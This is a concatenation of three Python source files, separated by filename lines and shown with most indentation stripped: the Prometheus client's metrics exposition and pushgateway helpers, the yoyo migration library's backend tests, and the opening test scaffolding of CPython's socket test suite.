# Munging from OpenMetrics into Prometheus format.
if mtype == 'counter':
mname = mname + '_total'
elif mtype == 'info':
mname = mname + '_info'
mtype = 'gauge'
elif mtype == 'stateset':
mtype = 'gauge'
elif mtype == 'gaugehistogram':
# A gauge histogram is really a gauge,
# but this captures the structure better.
mtype = 'histogram'
elif mtype == 'unknown':
mtype = 'untyped'
output.append('# HELP {} {}\n'.format(
mname, metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {mname} {mtype}\n')
om_samples = {}
for s in metric.samples:
for suffix in ['_created', '_gsum', '_gcount']:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
om_samples.setdefault(suffix, []).append(sample_line(s))
break
else:
output.append(sample_line(s))
except Exception as exception:
exception.args = (exception.args or ('',)) + (metric,)
raise
for suffix, lines in sorted(om_samples.items()):
output.append('# HELP {}{} {}\n'.format(metric.name, suffix,
metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {metric.name}{suffix} gauge\n')
output.extend(lines)
return ''.join(output).encode('utf-8')
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return generate_latest, CONTENT_TYPE_LATEST
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
# Prepare parameters
registry = self.registry
accept_header = self.headers.get('Accept')
params = parse_qs(urlparse(self.path).query)
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
self.send_response(int(status.split(' ')[0]))
self.send_header(*header)
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object),
{"registry": registry})
return MyMetricsHandler
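# Hedged sketch (not part of the original module): serve a specific registry with the
# factory above and the standard library HTTP server. The port is arbitrary.
def _example_serve_registry(registry, port=8001):
    from http.server import HTTPServer
    handler_cls = MetricsHandler.factory(registry)
    httpd = HTTPServer(('', port), handler_cls)
    httpd.serve_forever()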
def write_to_textfile(path, registry):
"""Write metrics to the given path.
This is intended for use with the Node exporter textfile collector.
The path must end in .prom for the textfile collector to process it."""
tmppath = f'{path}.{os.getpid()}.{threading.current_thread().ident}'
with open(tmppath, 'wb') as f:
f.write(generate_latest(registry))
# rename(2) is atomic but fails on Windows if the destination file exists
if os.name == 'nt':
os.replace(tmppath, path)
else:
os.rename(tmppath, path)
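# Hedged usage sketch (not in the original module): write metrics for the Node exporter
# textfile collector as described above. CollectorRegistry and Gauge come from elsewhere
# in the prometheus_client package; the .prom path is only the conventional location.
def _example_write_textfile():
    from prometheus_client import CollectorRegistry, Gauge
    registry = CollectorRegistry()
    last_run = Gauge('myapp_last_run_unixtime', 'Last run of the batch job', registry=registry)
    last_run.set_to_current_time()
    write_to_textfile('/var/lib/node_exporter/textfile_collector/myapp.prom', registry)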
def _make_handler(url, method, timeout, headers, data, base_handler):
def handle():
request = Request(url, data=data)
request.get_method = lambda: method
for k, v in headers:
request.add_header(k, v)
resp = build_opener(base_handler).open(request, timeout=timeout)
if resp.code >= 400:
raise OSError(f"error talking to pushgateway: {resp.code} {resp.msg}")
return handle
def default_handler(url, method, timeout, headers, data):
"""Default handler that implements HTTP/HTTPS connections.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
return _make_handler(url, method, timeout, headers, data, HTTPHandler)
def passthrough_redirect_handler(url, method, timeout, headers, data):
"""
Handler that automatically trusts redirect responses for all HTTP methods.
Augments standard HTTPRedirectHandler capability by permitting PUT requests,
preserving the method upon redirect, and passing through all headers and
data from the original request. Only use this handler if you control or
trust the source of redirect responses you encounter when making requests
via the Prometheus client. This handler will simply repeat the identical
request, including same method and data, to the new redirect URL."""
return _make_handler(url, method, timeout, headers, data, _PrometheusRedirectHandler)
def basic_auth_handler(url, method, timeout, headers, data, username=None, password=None):
"""Handler that implements HTTP/HTTPS connections with Basic Auth.
Sets auth headers using supplied 'username' and 'password', if set.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
def handle():
"""Handler that implements HTTP Basic Auth.
"""
if username is not None and password is not None:
auth_value = f'{username}:{password}'.encode()
auth_token = base64.b64encode(auth_value)
auth_header = b'Basic ' + auth_token
headers.append(['Authorization', auth_header])
default_handler(url, method, timeout, headers, data)()
return handle
def push_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""Push metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
If not None, the argument must be a function which accepts
the following arguments:
url, method, timeout, headers, and content
May be used to implement additional functionality not
supported by the built-in default handler (such as SSL
client certificates, and HTTP authentication mechanisms).
'url' is the URL for the request, the 'gateway' argument
described earlier will form the basis of this URL.
'method' is the HTTP method which should be used when
carrying out the request.
'timeout' requests not successfully completed after this
many seconds should be aborted. If timeout is None, then
the handler should not set a timeout.
'headers' is a list of ("header-name","header-value") tuples
which must be passed to the pushgateway in the form of HTTP
request headers.
The function should raise an exception (e.g. IOError) on
failure.
'content' is the data which should be used to form the HTTP
Message Body.
This overwrites all metrics with the same job and grouping_key.
This uses the PUT HTTP method."""
_use_gateway('PUT', gateway, job, registry, grouping_key, timeout, handler)
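# Hedged usage sketch (not part of the original module): push a batch job's metrics to a
# Pushgateway as described in the docstring above. The gateway address, metric name and
# credentials are placeholders; basic_auth_handler and instance_ip_grouping_key are the
# helpers defined elsewhere in this module.
def _example_push_job_metrics():
    from functools import partial
    from prometheus_client import CollectorRegistry, Gauge
    registry = CollectorRegistry()
    duration = Gauge('myapp_job_duration_seconds', 'Duration of the last run', registry=registry)
    duration.set(12.3)
    handler = partial(basic_auth_handler, username='user', password='secret')
    push_to_gateway('pushgateway.local:9091', job='myapp_batch', registry=registry,
                    grouping_key=instance_ip_grouping_key(), handler=handler)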
def pushadd_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""PushAdd metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This replaces metrics with the same name, job and grouping_key.
This uses the POST HTTP method."""
_use_gateway('POST', gateway, job, registry, grouping_key, timeout, handler)
def delete_from_gateway(
gateway, job, grouping_key=None, timeout=30, handler=default_handler):
"""Delete metrics from the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long delete will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This deletes metrics with the given job and grouping_key.
This uses the DELETE HTTP method."""
_use_gateway('DELETE', gateway, job, None, grouping_key, timeout, handler)
def _use_gateway(method, gateway, job, registry, grouping_key, timeout, handler):
gateway_url = urlparse(gateway)
# See https://bugs.python.org/issue27657 for details on urlparse in py>=3.7.6.
if not gateway_url.scheme or (
PYTHON376_OR_NEWER
and gateway_url.scheme not in ['http', 'https']
):
gateway = f'http://{gateway}'
gateway = gateway.rstrip('/')
url = '{}/metrics/{}/{}'.format(gateway, *_escape_grouping_key("job", job))
data = b''
if method != 'DELETE':
data = generate_latest(registry)
if grouping_key is None:
grouping_key = {}
url += ''.join(
'/{}/{}'.format(*_escape_grouping_key(str(k), str(v)))
for k, v in sorted(grouping_key.items()))
handler(
url=url, method=method, timeout=timeout,
headers=[('Content-Type', CONTENT_TYPE_LATEST)], data=data,
)()
def _escape_grouping_key(k, v):
if v == "":
# Per https://github.com/prometheus/pushgateway/pull/346.
return k + "@base64", "="
elif '/' in v:
# Added in Pushgateway 0.9.0.
return k + "@base64", base64.urlsafe_b64encode(v.encode("utf-8")).decode("utf-8")
else:
return k, quote_plus(v)
def instance_ip_grouping_key():
"""Grouping key with instance set to the IP Address of this host."""
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
if sys.platform == 'darwin':
# This check is done this way only on macOS, because the
# localhost method does not work there.
# This method was adapted from this StackOverflow answer:
# https://stackoverflow.com/a/28950776
s.connect(('10.255.255.255', 1))
else:
s.connect(('localhost', 0))
return {'instance': s.getsockname()[0]}
from .asgi import make_asgi_app # noqa
|
test_backends.py
|
from functools import partial
from tempfile import NamedTemporaryFile
from threading import Thread
import time
from mock import Mock
from mock import call
from mock import patch
import pytest
from yoyo import backends
from yoyo import read_migrations
from yoyo import exceptions
from yoyo.connections import get_backend
from tests import get_test_backends
from tests import get_test_dburis
from tests import with_migrations
class TestTransactionHandling(object):
def test_it_commits(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",)]
def test_it_rolls_back(self, backend):
with pytest.raises(backend.DatabaseError):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
# Invalid SQL to produce an error
backend.execute("INSERT INTO nonexistant values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == []
def test_it_nests_transactions(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('B')")
trans.rollback()
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('C')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",), ("C",)]
def test_backend_detects_transactional_ddl(self, backend):
expected = {
backends.PostgresqlBackend: True,
backends.SQLiteBackend: True,
backends.MySQLBackend: False,
}
if backend.__class__ in expected:
assert backend.has_transactional_ddl is expected[backend.__class__]
def test_non_transactional_ddl_behaviour(self, backend):
"""
DDL queries in MySQL commit the current transaction,
but it still seems to respect a subsequent rollback.
We don't rely on this behaviour, but it's weird and worth having
a test to document how it works and flag up in future should a new
backend do things differently
"""
if backend.has_transactional_ddl:
return
with backend.transaction() as trans:
backend.execute("CREATE TABLE yoyo_a (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_a VALUES (1)")
backend.execute("CREATE TABLE yoyo_b (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_b VALUES (1)")
trans.rollback()
count_a = backend.execute("SELECT COUNT(1) FROM yoyo_a").fetchall()[0][0]
assert count_a == 1
count_b = backend.execute("SELECT COUNT(1) FROM yoyo_b").fetchall()[0][0]
assert count_b == 0
@with_migrations(
a="""
__transactional__ = False
step('CREATE DATABASE yoyo_test_tmp',
'DROP DATABASE yoyo_test_tmp',
)
"""
)
def test_statements_requiring_no_transaction(self, tmpdir):
"""
PostgreSQL will error if certain statements (eg CREATE DATABASE)
are run within a transaction block.
As far as I know this behavior is PostgreSQL specific. We can't run
this test in sqlite or oracle as they do not support CREATE DATABASE.
"""
for backend in get_test_backends(exclude={"sqlite", "oracle"}):
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
backend.rollback_migrations(migrations)
@with_migrations(
a="""
__transactional__ = False
def reopen_db(conn):
import sqlite3
for _, db, filename in conn.execute('PRAGMA database_list'):
if db == 'main':
reconn = sqlite3.connect(filename)
reconn.execute("CREATE TABLE yoyo_test_b (id int)")
break
else:
raise AssertionError("sqlite main database not found")
step('CREATE TABLE yoyo_test_a (id int)')
step(reopen_db)
step('CREATE TABLE yoyo_test_c (id int)')
"""
)
def test_disabling_transactions_in_sqlite(self, tmpdir):
"""
Transactions cause sqlite databases to become locked, preventing
other tools from accessing them:
https://bitbucket.org/ollyc/yoyo/issues/43/run-step-outside-of-transaction
"""
with NamedTemporaryFile() as tmp:
backend = get_backend("sqlite:///" + tmp.name)
backend.apply_migrations(read_migrations(tmpdir))
assert "yoyo_test_a" in backend.list_tables()
assert "yoyo_test_b" in backend.list_tables()
assert "yoyo_test_c" in backend.list_tables()
class TestConcurrency(object):
# How long to lock for: long enough to allow a migration to be loaded and
# started without unduly slowing down the test suite
lock_duration = 0.2
def do_something_with_lock(self, dburi):
with get_backend(dburi).lock():
time.sleep(self.lock_duration)
def skip_if_not_concurrency_safe(self, backend):
if "sqlite" in backend.uri.scheme and backend.uri.database == ":memory:":
pytest.skip(
"Concurrency tests not supported for SQLite "
"in-memory databases, which cannot be shared "
"between threads"
)
if backend.driver.threadsafety < 1:
pytest.skip(
"Concurrency tests not supported for " "non-threadsafe backends"
)
def test_lock(self, dburi):
"""
Test that :meth:`~yoyo.backends.DatabaseBackend.lock`
acquires an exclusive lock
"""
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
t = time.time()
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with backend.lock():
delta = time.time() - t
assert delta >= self.lock_duration
thread.join()
def test_lock_times_out(self, dburi):
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with pytest.raises(exceptions.LockTimeout):
with backend.lock(timeout=0.001):
assert False, "Execution should never reach this point"
thread.join()
class TestInitConnection(object):
class MockBackend(backends.DatabaseBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
def list_tables(self):
return []
def connect(self, dburi):
return Mock()
def test_it_calls_init_connection(self):
with patch("yoyo.internalmigrations.upgrade"), patch.object(
self.MockBackend, "init_connection", Mock()
) as mock_init:
backend = self.MockBackend("", "")
connection = backend.connection
assert mock_init.call_args == call(connection)
mock_init.reset_mock()
backend.rollback()
assert mock_init.call_args_list == [call(connection)]
def test_postgresql_backend_sets_search_path(self):
class MockPGBackend(backends.PostgresqlBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
schema = "foo"
def connect(self, dburi):
return Mock()
with patch("yoyo.internalmigrations.upgrade"):
backend = MockPGBackend("", "")
backend.rollback()
assert backend.connection.cursor().execute.call_args == call(
"SET search_path TO foo"
)
def test_postgresql_connects_with_schema(self):
dburi = next(iter(get_test_dburis(only={"postgresql"})), None)
if dburi is None:
pytest.skip("PostgreSQL backend not available")
backend = get_backend(dburi)
with backend.transaction():
backend.execute("CREATE SCHEMA foo")
try:
assert get_backend(dburi + "?schema=foo").execute(
"SHOW search_path"
).fetchone() == ("foo",)
finally:
with backend.transaction():
backend.execute("DROP SCHEMA foo CASCADE")
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import platform
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
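# Hedged sketch (not part of the test suite): pack and unpack one raw CAN frame using the
# "=IB3x8s" layout documented above -- a 32-bit can_id, a 1-byte data length code, three
# pad bytes and eight data bytes. Short payloads are null-padded by struct.
def _example_can_frame_roundtrip():
    can_id, data = 0x123, b'\x01\x02\x03'
    frame = struct.pack(SocketCANTest.can_frame_fmt, can_id, len(data), data)
    unpacked_id, dlc, payload = struct.unpack(SocketCANTest.can_frame_fmt, frame)
    assert (unpacked_id, payload[:dlc]) == (can_id, data)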
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
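# Hedged sketch (not an actual test from this suite): the server/client pairing that the
# ThreadableTest docstring describes, built on SocketConnectedTest. The server portion
# runs in the main thread; the '_'-prefixed client portion runs in the client thread.
class _ExampleEchoTest(SocketConnectedTest):
    def testEcho(self):  # server portion
        self.assertEqual(self.cli_conn.recv(1024), MSG)
    def _testEcho(self):  # client portion
        self.serv_conn.send(MSG)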
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
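# As an illustrative sketch only (the concrete combinations actually used by
# the tests appear further below), such a drop-in replacement could be built
# as, e.g.:
#
#     class ConnectedTCPTestBase(ConnectedStreamTestMixin, TCPTestBase):
#         pass
#
# where the mixins take care of threading the client, connecting it, and
# filling in serv_addr and cli_addr.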
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
